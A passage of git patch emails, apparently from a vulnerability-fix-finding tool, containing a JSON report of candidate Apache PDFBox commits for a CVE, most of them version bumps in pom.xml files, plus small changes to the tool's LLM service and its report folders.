c365bee98..aba5ad314 100644", + "--- a/xmpbox/pom.xml", + "+++ b/xmpbox/pom.xml", + "@@ -29,3 +29,3 @@", + " \t\tpdfbox-parent", + "-\t\t2.0.10-SNAPSHOT", + "+\t\t2.0.10", + " \t\t../parent/pom.xml" + ], + "changed_files": [ + "app/pom.xml", + "debugger-app/pom.xml", + "debugger/pom.xml", + "examples/pom.xml", + "fontbox/pom.xml", + "parent/pom.xml", + "pdfbox/pom.xml", + "pom.xml", + "preflight-app/pom.xml", + "preflight/pom.xml", + "tools/pom.xml", + "xmpbox/pom.xml" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [] + }, + { + "commit_id": "898aa0f4b8d5fe94dd84961dba59c5d08c2be600", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529948694, + "hunks": 0, + "message": "[maven-release-plugin] copy for tag 1.8.15 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/tags/1.8.15@1834352 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "1.8.15" + ], + "matched_rules": [] + }, + { + "commit_id": "e0af8f4fdbe867d065099dbab6629da4ad957e9e", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523716510, + "hunks": 1, + "message": "replaced oraclejdk7 with openjdk7 as the oracle version is no longer supported git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829148 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/.travis.yml b/.travis.yml", + "index 8ec4faa61..22c784485 100644", + "--- a/.travis.yml", + "+++ b/.travis.yml", + "@@ -23,3 +23,3 @@ jdk:", + " - oraclejdk8", + "- - oraclejdk7", + "+ - openjdk7" + ], + "changed_files": [ + ".travis.yml" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [] + }, + { + "commit_id": "3d4846fbb72b6ec57b8dcd8bd36760402c8217fa", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529950955, + "hunks": 16, + "message": "[maven-release-plugin] prepare release 2.0.11 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834357 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/app/pom.xml b/app/pom.xml", + "index 3b63ef8c3..be401960c 100644", + "--- a/app/pom.xml", + "+++ b/app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11-SNAPSHOT", + "+ 2.0.11", + " ../parent/pom.xml", + "diff --git a/debugger-app/pom.xml b/debugger-app/pom.xml", + "index 05db6b613..fb0ad541f 100644", + "--- a/debugger-app/pom.xml", + "+++ b/debugger-app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11-SNAPSHOT", + "+ 2.0.11", + " ../parent/pom.xml", + "diff --git a/debugger/pom.xml b/debugger/pom.xml", + "index b62f9c818..626d3c719 100644", + "--- a/debugger/pom.xml", + "+++ b/debugger/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11-SNAPSHOT", + "+ 2.0.11", + " ../parent/pom.xml", + "diff --git a/examples/pom.xml b/examples/pom.xml", + "index 8b73b5b69..aac6580d2 100644", + "--- a/examples/pom.xml", + "+++ b/examples/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11-SNAPSHOT", + "+ 2.0.11", + " ../parent/pom.xml", + "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", + "index 9c1bbc6ff..027b01f9f 100644", + "--- a/fontbox/pom.xml", + "+++ b/fontbox/pom.xml", + "@@ -23,3 +23,3 @@", + " pdfbox-parent", + "- 2.0.11-SNAPSHOT", + "+ 2.0.11", + " ../parent/pom.xml", + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index b0c39228e..745f2286b 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -31,3 +31,3 @@", + " pdfbox-parent", + "- 2.0.11-SNAPSHOT", + "+ 2.0.11", + " pom", + "@@ -429,5 +429,5 @@", + " ", + "- scm:svn:http://svn.apache.org/repos/asf/maven/pom/branches/2.0/pdfbox-parent", + "- scm:svn:https://svn.apache.org/repos/asf/maven/pom/branches/2.0/pdfbox-parent", + "- http://svn.apache.org/viewvc/maven/pom/branches/2.0/pdfbox-parent", + "+ scm:svn:http://svn.apache.org/repos/asf/maven/pom/tags/2.0.11/pdfbox-parent", + "+ scm:svn:https://svn.apache.org/repos/asf/maven/pom/tags/2.0.11/pdfbox-parent", + "+ http://svn.apache.org/viewvc/maven/pom/tags/2.0.11/pdfbox-parent", + " ", + "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", + "index be6303e39..5788f62ea 100644", + "--- a/pdfbox/pom.xml", + "+++ b/pdfbox/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11-SNAPSHOT", + "+ 2.0.11", + " ../parent/pom.xml", + "diff --git a/pom.xml b/pom.xml", + "index 13c40e96a..bb5300b5d 100644", + "--- a/pom.xml", + "+++ b/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11-SNAPSHOT", + "+ 2.0.11", + " parent/pom.xml", + "@@ -36,8 +36,8 @@", + " ", + "- scm:svn:http://svn.apache.org/repos/asf/pdfbox/branches/2.0", + "+ scm:svn:http://svn.apache.org/repos/asf/pdfbox/tags/2.0.11", + " ", + " ", + "- scm:svn:https://svn.apache.org/repos/asf/pdfbox/branches/2.0", + "+ scm:svn:https://svn.apache.org/repos/asf/pdfbox/tags/2.0.11", + " ", + "- http://svn.apache.org/viewvc/pdfbox/branches/2.0", + "+ http://svn.apache.org/viewvc/pdfbox/tags/2.0.11", + " ", + "diff --git a/preflight-app/pom.xml b/preflight-app/pom.xml", + "index cc1b043fa..a8733a59b 100644", + "--- a/preflight-app/pom.xml", + "+++ b/preflight-app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11-SNAPSHOT", + "+ 2.0.11", + " ../parent/pom.xml", + "diff --git a/preflight/pom.xml b/preflight/pom.xml", + "index dc12a0117..f7eb5a9af 100644", + "--- a/preflight/pom.xml", + "+++ b/preflight/pom.xml", + "@@ -28,3 +28,3 @@", + " \t\tpdfbox-parent", + "-\t\t2.0.11-SNAPSHOT", + "+\t\t2.0.11", + " \t\t../parent/pom.xml", + "diff --git a/tools/pom.xml b/tools/pom.xml", + "index ab26ab8b6..821dff855 100644", + "--- a/tools/pom.xml", + "+++ b/tools/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.11-SNAPSHOT", + "+ 2.0.11", + " ../parent/pom.xml", + "diff --git a/xmpbox/pom.xml b/xmpbox/pom.xml", + "index 142025bf8..5f8b41f63 100644", + "--- a/xmpbox/pom.xml", + "+++ b/xmpbox/pom.xml", + "@@ -29,3 +29,3 @@", + " \t\tpdfbox-parent", + "-\t\t2.0.11-SNAPSHOT", + "+\t\t2.0.11", + " \t\t../parent/pom.xml" + ], + "changed_files": [ + "app/pom.xml", + "debugger-app/pom.xml", + "debugger/pom.xml", + "examples/pom.xml", + "fontbox/pom.xml", + "parent/pom.xml", + "pdfbox/pom.xml", + "pom.xml", + "preflight-app/pom.xml", + "preflight/pom.xml", + "tools/pom.xml", + "xmpbox/pom.xml" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [] + }, + { + "commit_id": "82544a7acecdd25f4156225bf96feef0c804953b", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523900232, + "hunks": 13, + "message": "rollback 1.8.14 release preparation git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1829302 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/ant/pom.xml b/ant/pom.xml", + "index e61e4f675..8ac09774b 100644", + "--- a/ant/pom.xml", + "+++ b/ant/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.14-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/app/pom.xml b/app/pom.xml", + "index 2e220897c..a77629018 100644", + "--- a/app/pom.xml", + "+++ b/app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.14-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/examples/pom.xml b/examples/pom.xml", + "index 5a637b743..3bfb8beff 100644", + "--- a/examples/pom.xml", + "+++ b/examples/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.14-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", + "index 5e4913eff..2713b99dc 100644", + "--- a/fontbox/pom.xml", + "+++ b/fontbox/pom.xml", + "@@ -23,3 +23,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.14-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/jempbox/pom.xml b/jempbox/pom.xml", + "index 1920365b4..ad65c38fd 100644", + "--- a/jempbox/pom.xml", + "+++ b/jempbox/pom.xml", + "@@ -23,3 +23,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.14-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/lucene/pom.xml b/lucene/pom.xml", + "index 53f5d2567..22f3efc4e 100644", + "--- a/lucene/pom.xml", + "+++ b/lucene/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.14-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 93d0066d5..f50b5fb99 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -31,3 +31,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.14-SNAPSHOT", + " pom", + "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", + "index cc2a1f99e..7c050baff 100644", + "--- a/pdfbox/pom.xml", + "+++ b/pdfbox/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.14-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/pom.xml b/pom.xml", + "index 0375a4c22..5b96d706f 100644", + "--- a/pom.xml", + "+++ b/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.14-SNAPSHOT", + " parent/pom.xml", + "diff --git a/preflight-app/pom.xml b/preflight-app/pom.xml", + "index f9dc36763..48ba66e1b 100644", + "--- a/preflight-app/pom.xml", + "+++ b/preflight-app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.14-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/preflight/pom.xml b/preflight/pom.xml", + "index a05c3c885..7731012a7 100644", + "--- a/preflight/pom.xml", + "+++ b/preflight/pom.xml", + "@@ -28,3 +28,3 @@", + " \t\tpdfbox-parent", + "-\t\t1.8.15-SNAPSHOT", + "+\t\t1.8.14-SNAPSHOT", + " \t\t../parent/pom.xml", + "diff --git a/war/pom.xml b/war/pom.xml", + "index cff876942..0bf5f0e7b 100644", + "--- a/war/pom.xml", + "+++ b/war/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.14-SNAPSHOT", + " ../parent/pom.xml", + "diff --git a/xmpbox/pom.xml b/xmpbox/pom.xml", + "index fb5399bbc..039db8267 100644", + "--- a/xmpbox/pom.xml", + "+++ b/xmpbox/pom.xml", + "@@ -29,3 +29,3 @@", + " \t\tpdfbox-parent", + "-\t\t1.8.15-SNAPSHOT", + "+\t\t1.8.14-SNAPSHOT", + " \t\t../parent/pom.xml" + ], + "changed_files": [ + "ant/pom.xml", + "app/pom.xml", + "examples/pom.xml", + "fontbox/pom.xml", + "jempbox/pom.xml", + "lucene/pom.xml", + "parent/pom.xml", + "pdfbox/pom.xml", + "pom.xml", + "preflight-app/pom.xml", + "preflight/pom.xml", + "war/pom.xml", + "xmpbox/pom.xml" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "1.8.14", + "1.8.15", + "1.8.16", + "1.8.17" + ], + "matched_rules": [] + }, + { + "commit_id": "a625e6e1aa6df28a1b345501eefcc5be62a463d2", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529348914, + "hunks": 0, + "message": "[maven-release-plugin] copy for tag 2.0.10 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/tags/2.0.10@1833754 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "2.0.10" + ], + "matched_rules": [] + }, + { + "commit_id": "10569b242fca628db93f5a7f5b2cfe7a046fc636", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529950968, + "hunks": 0, + "message": "[maven-release-plugin] copy for tag 2.0.11 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/tags/2.0.11@1834358 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "2.0.11" + ], + "matched_rules": [] + }, + { + "commit_id": "d23be8652f6485fabfbbea7344b0a05dbac3242a", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529948681, + "hunks": 17, + "message": "[maven-release-plugin] prepare release 1.8.15 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1834351 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/ant/pom.xml b/ant/pom.xml", + "index e61e4f675..a678fdac4 100644", + "--- a/ant/pom.xml", + "+++ b/ant/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.15", + " ../parent/pom.xml", + "diff --git a/app/pom.xml b/app/pom.xml", + "index 2e220897c..6a78d641d 100644", + "--- a/app/pom.xml", + "+++ b/app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.15", + " ../parent/pom.xml", + "diff --git a/examples/pom.xml b/examples/pom.xml", + "index 5a637b743..81fc04a5e 100644", + "--- a/examples/pom.xml", + "+++ b/examples/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.15", + " ../parent/pom.xml", + "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", + "index 5e4913eff..47da4c91f 100644", + "--- a/fontbox/pom.xml", + "+++ b/fontbox/pom.xml", + "@@ -23,3 +23,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.15", + " ../parent/pom.xml", + "diff --git a/jempbox/pom.xml b/jempbox/pom.xml", + "index 1920365b4..80e766c7f 100644", + "--- a/jempbox/pom.xml", + "+++ b/jempbox/pom.xml", + "@@ -23,3 +23,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.15", + " ../parent/pom.xml", + "diff --git a/lucene/pom.xml b/lucene/pom.xml", + "index 53f5d2567..f26937c54 100644", + "--- a/lucene/pom.xml", + "+++ b/lucene/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.15", + " ../parent/pom.xml", + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 70fbf26fe..0c0dbfa4e 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -31,3 +31,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.15", + " pom", + "@@ -321,5 +321,5 @@", + " ", + "- scm:svn:http://svn.apache.org/repos/asf/maven/pom/branches/1.8/pdfbox-parent", + "- scm:svn:https://svn.apache.org/repos/asf/maven/pom/branches/1.8/pdfbox-parent", + "- http://svn.apache.org/viewvc/maven/pom/branches/1.8/pdfbox-parent", + "+ scm:svn:http://svn.apache.org/repos/asf/maven/pom/tags/1.8.15/pdfbox-parent", + "+ scm:svn:https://svn.apache.org/repos/asf/maven/pom/tags/1.8.15/pdfbox-parent", + "+ http://svn.apache.org/viewvc/maven/pom/tags/1.8.15/pdfbox-parent", + " ", + "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", + "index cc2a1f99e..29788276c 100644", + "--- a/pdfbox/pom.xml", + "+++ b/pdfbox/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.15", + " ../parent/pom.xml", + "diff --git a/pom.xml b/pom.xml", + "index a9254568c..b28c065cc 100644", + "--- a/pom.xml", + "+++ b/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.15", + " parent/pom.xml", + "@@ -36,8 +36,8 @@", + " ", + "- scm:svn:http://svn.apache.org/repos/asf/pdfbox/branches/1.8", + "+ scm:svn:http://svn.apache.org/repos/asf/pdfbox/tags/1.8.15", + " ", + " ", + "- scm:svn:https://svn.apache.org/repos/asf/pdfbox/branches/1.8", + "+ scm:svn:https://svn.apache.org/repos/asf/pdfbox/tags/1.8.15", + " ", + "- http://svn.apache.org/viewvc/pdfbox/branches/1.8", + "+ http://svn.apache.org/viewvc/pdfbox/tags/1.8.15", + " ", + "diff --git a/preflight-app/pom.xml b/preflight-app/pom.xml", + "index f9dc36763..0d55d5f8f 100644", + "--- a/preflight-app/pom.xml", + "+++ b/preflight-app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.15", + " ../parent/pom.xml", + "diff --git a/preflight/pom.xml b/preflight/pom.xml", + "index a05c3c885..eccdf62ab 100644", + "--- a/preflight/pom.xml", + "+++ b/preflight/pom.xml", + "@@ -28,3 +28,3 @@", + " \t\tpdfbox-parent", + "-\t\t1.8.15-SNAPSHOT", + "+\t\t1.8.15", + " \t\t../parent/pom.xml", + "diff --git a/war/pom.xml b/war/pom.xml", + "index cff876942..b647f52a4 100644", + "--- a/war/pom.xml", + "+++ b/war/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 1.8.15-SNAPSHOT", + "+ 1.8.15", + " ../parent/pom.xml", + "diff --git a/xmpbox/pom.xml b/xmpbox/pom.xml", + "index fb5399bbc..bbdf06167 100644", + "--- a/xmpbox/pom.xml", + "+++ b/xmpbox/pom.xml", + "@@ -29,3 +29,3 @@", + " \t\tpdfbox-parent", + "-\t\t1.8.15-SNAPSHOT", + "+\t\t1.8.15", + " \t\t../parent/pom.xml" + ], + "changed_files": [ + "ant/pom.xml", + "app/pom.xml", + "examples/pom.xml", + "fontbox/pom.xml", + "jempbox/pom.xml", + "lucene/pom.xml", + "parent/pom.xml", + "pdfbox/pom.xml", + "pom.xml", + "preflight-app/pom.xml", + "preflight/pom.xml", + "war/pom.xml", + "xmpbox/pom.xml" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "1.8.15", + "1.8.16", + "1.8.17" + ], + "matched_rules": [] + } + ] +} From 03e1cefa83fe51f4786c5cd13b60a1ca10b6ca86 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 15 Jul 2024 13:01:01 +0000 Subject: [PATCH 027/130] adds collection of LLM stats to the LLM class --- prospector/llm/llm_service.py | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/prospector/llm/llm_service.py b/prospector/llm/llm_service.py index 70b4bfdb0..e670f1a4b 100644 --- a/prospector/llm/llm_service.py +++ b/prospector/llm/llm_service.py @@ -62,6 +62,15 @@ def get_repository_url( try: chain = prompt_best_guess | self.model | StrOutputParser() + # Shorten the dictionary of references to avoid exceeding the token limit + if len(advisory_references) >= 300: + sorted_references = dict( + sorted(advisory_references.items(), key=lambda item: item[1]) + ) + advisory_references = dict( + itertools.islice(sorted_references.items(), 200) + ) + url = chain.invoke( { "description": advisory_description, From ef1c1a2f83338b7bc05b68863230d625c5d36ed9 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 15 Jul 2024 14:32:48 +0000 Subject: [PATCH 028/130] adds folder structure for reports and 1 first report generated in containerised Prospector with LLM --- .../steady_dataset.csv/CVE-2018-11797.json | 34820 --------------- .../steady_dataset.csv | 0 .../steady_dataset/CVE-20201-21274.json | 36097 ++++++++++++++++ 3 files changed, 36097 insertions(+), 34820 deletions(-) delete mode 100644 prospector/empirical_study/datasets/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv/CVE-2018-11797.json rename prospector/evaluation/data/{steady_dataset/starting_datasets => input}/steady_dataset.csv (100%) create mode 100644 prospector/evaluation/data/reports/steady_dataset/CVE-20201-21274.json diff --git a/prospector/empirical_study/datasets/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv/CVE-2018-11797.json b/prospector/empirical_study/datasets/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv/CVE-2018-11797.json deleted file mode 100644 index c0e38770f..000000000 --- a/prospector/empirical_study/datasets/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv/CVE-2018-11797.json +++ /dev/null @@ -1,34820 +0,0 @@ -{ - "advisory_record": { - "cve_id": "CVE-2018-11797", - "description": "In Apache PDFBox 1.8.0 to 1.8.15 and 2.0.0RC1 to 2.0.11, a carefully crafted PDF file can trigger an extremely long running computation when parsing the page tree.", - "reserved_timestamp": 1528156800, - "published_timestamp": 1538697600, - "updated_timestamp": 1621346775, - "repository_url": null, - "references": { - "https://lists.apache.org/thread.html/645574bc50b886d39c20b4065d51ccb1cd5d3a6b4750a22edbb565eb%40%3Cannounce.apache.org%3E": 2, - "https://lists.apache.org/thread.html/a9760973a873522f4d4c0a99916ceb74f361d91006b663a0a418d34a%40%3Cannounce.apache.org%3E": 2, - "https://lists.debian.org/debian-lts-announce/2018/10/msg00008.html": 2, - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/POPOGHJ5CVMUVCRQU7APBAN5IVZGZFDX/": 2, - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HKVPTJWZGUB4MH4AAOWMRJHRDBYFHGJ/": 2, - "https://www.oracle.com/security-alerts/cpuapr2020.html": 2, - "https://lists.apache.org/thread.html/r54594251369e14c185da9662a5340a52afbbdf75d61c9c3a69c8f2e8%40%3Cdev.pdfbox.apache.org%3E": 2 - }, - "affected_products": [ - "PDFBox", - "Apache PDFBox", - "Apache" - ], - "versions": { - "status": "affected", - "version": "1.8.0 to 1.8.15" - }, - "files": [ - "PDF", - "PDFBox" - ], - "keywords": [ - "tree", - "apache", - "craft", - "file", - "parse", - "page", - "pdfbox", - "running", - "trigger", - "computation" - ], - "files_extension": [], - "has_fixing_commit": false - }, - "commits": [ - { - "commit_id": "48dbb7ff9c2ef62282f8363c8592239251b48244", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523989276, - "hunks": 5, - "message": "PDFBOX-2941: don't lose benchmark result when mouse moves into PDF pane and out git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829382 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java b/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", - "index 83702b12f..3a6ba445b 100644", - "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", - "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", - "@@ -63,2 +63,3 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", - " private final PDPage page;", - "+ private String labelText = \"\";", - "@@ -236,3 +237,3 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", - " {", - "- statuslabel.setText(\"\");", - "+ statuslabel.setText(labelText);", - " }", - "@@ -259,3 +260,4 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", - " label.setIcon(null);", - "- label.setText(\"Rendering...\");", - "+ labelText = \"Rendering...\";", - "+ label.setText(labelText);", - " PDFRenderer renderer = new PDFRenderer(document);", - "@@ -263,6 +265,7 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", - " long t0 = System.currentTimeMillis();", - "- statuslabel.setText(\"Rendering...\");", - "+ statuslabel.setText(labelText);", - " BufferedImage bim = renderer.renderImage(pageIndex, scale);", - " float t = (System.currentTimeMillis() - t0) / 1000f;", - "- statuslabel.setText(\"Rendered in \" + t + \" second\" + (t > 1 ? \"s\" : \"\"));", - "+ labelText = \"Rendered in \" + t + \" second\" + (t > 1 ? \"s\" : \"\");", - "+ statuslabel.setText(labelText);", - " return ImageUtil.getRotatedImage(bim, rotation);" - ], - "changed_files": [ - "debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-2941": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "RELEVANT_WORDS_IN_MESSAGE", - "message": "The commit message contains some relevant words: PDF", - "relevance": 8 - }, - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-2941", - "relevance": 2 - } - ] - }, - { - "commit_id": "54c040c429912040f5a1911c0a8c593b0b9d4821", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524320249, - "hunks": 150, - "message": "PDFBOX-4189: Enable PDF creation with Bengali by reading and utilizing the GSUB table, by Palash Ray git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829710 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "new file mode 100644", - "index 000000000..221549918", - "--- /dev/null", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "@@ -0,0 +1,115 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+", - "+package org.apache.pdfbox.examples.pdmodel;", - "+", - "+import java.io.IOException;", - "+import java.net.URISyntaxException;", - "+", - "+import org.apache.pdfbox.pdmodel.PDDocument;", - "+import org.apache.pdfbox.pdmodel.PDPage;", - "+import org.apache.pdfbox.pdmodel.PDPageContentStream;", - "+import org.apache.pdfbox.pdmodel.font.PDFont;", - "+import org.apache.pdfbox.pdmodel.font.PDType0Font;", - "+import org.apache.pdfbox.pdmodel.graphics.image.PDImageXObject;", - "+", - "+/**", - "+ * Inspired from PdfBox", - "+ * Example. This attempts to correctly demonstrate to what extent Bengali text rendering is", - "+ * supported. First, we render some text, and then embed an image with the correct text displayed on", - "+ * the next page.", - "+ *", - "+ * @author 